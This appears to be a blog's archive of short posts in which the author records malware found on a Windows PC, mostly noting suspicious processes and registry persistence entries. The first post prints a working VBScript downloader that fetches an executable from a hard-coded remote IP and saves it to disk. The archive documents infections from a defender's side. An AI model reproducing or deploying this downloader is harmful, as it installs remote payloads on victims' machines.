Category Archives: Virus/Worm
iget.vbe
I just found a virus-like file under c:\; the content is:
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://222.66.200.102:8080/1/3.exe",0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "C\1.exe",2
mravsc32.exe
This worm created a lot of TCP connections and affected normal internet usage. It will spawn another process once it is killed. Well, I can suspend it and then google a solution.
sddriver.exe
sddriver.exe seems to be a worm; it initiated a lot of connections (can be seen in TCPView.exe) and affected normal use of the web browser. It is found in the following registry entries, but the file is not found on disk.
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunCall …
Firefox displays blank page for many urls
Today when I was surfing the internet, Firefox suddenly couldn't open new pages correctly; they were just blank. After launching TCPView.exe I found rundll.exe (PID=4848) making lots of connection attempts, much like a virus/worm, so I killed it and Firefox resumed …
wishs.exe — virus or worm?
Wishs.exe is found in the following registry entries:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
Microsoft=wishs.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
Microsoft=wishs.exe
[HKEY_USERS\.DEFAULT\Software\ASProtect]
Microsoft=wishs.exe